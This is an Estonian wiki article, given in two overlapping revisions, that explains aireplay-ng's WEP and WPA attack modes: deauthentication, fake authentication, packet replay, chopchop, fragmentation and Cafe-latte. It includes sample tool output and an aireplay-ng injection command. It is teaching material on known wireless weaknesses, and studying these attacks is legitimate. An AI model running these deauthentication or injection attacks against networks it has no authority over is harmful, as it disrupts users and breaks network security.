&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
15:49:32  Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga, kuna see ajab ruuteri segadusse(?). See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiamist autentida, seega saame kerge vaevaga ennast ära assotsida ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud ja võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.(?)&lt;br /&gt;
&amp;lt;pre&amp;gt;15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA handshake paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud handshake&#039;id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK võttis hästituntud nõrga ICV[link] probleemi ja järeldas sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi plaintekst väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada) et luu abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või rejectitakse. Iga saadetud pakk baseerub arvatava baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine broadcasti ilma autentimata. Soovitatav on võtta ka lühem pakett kuna deükrptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab proigramm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagstatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab custom pakette injectida. Muidugi on vajalik assotsitud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - AP ei pea selles etapis tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki integrity kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 target IP ja target MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib target MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub source IP - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
Valiidse ARP päringu saatmiseks kliendile peame liigutama source IP positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks incoming source IP positsioonile 33. Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
IP Paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi source MAC&#039;i muutmiseks juhul kui seal on algselt multicast.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
\[\[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30971</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=30971"/>
		<updated>2011-05-10T10:14:20Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Meetodid */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide dissimisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta broadcastis.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP cache tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentimist.[2]&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
&lt;br /&gt;
====Suunatud====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
12:35:25  Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud VS broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud disconnect paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv on korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
15:49:32  Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nagu mainitud, broadcast disconnect on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga, kuna see ajab ruuteri segadusse(?). See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiamist autentida, seega saame kerge vaevaga ennast ära assotsida ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud ja võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.(?)&lt;br /&gt;
&amp;lt;pre&amp;gt;15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA handshake paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud handshake&#039;id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
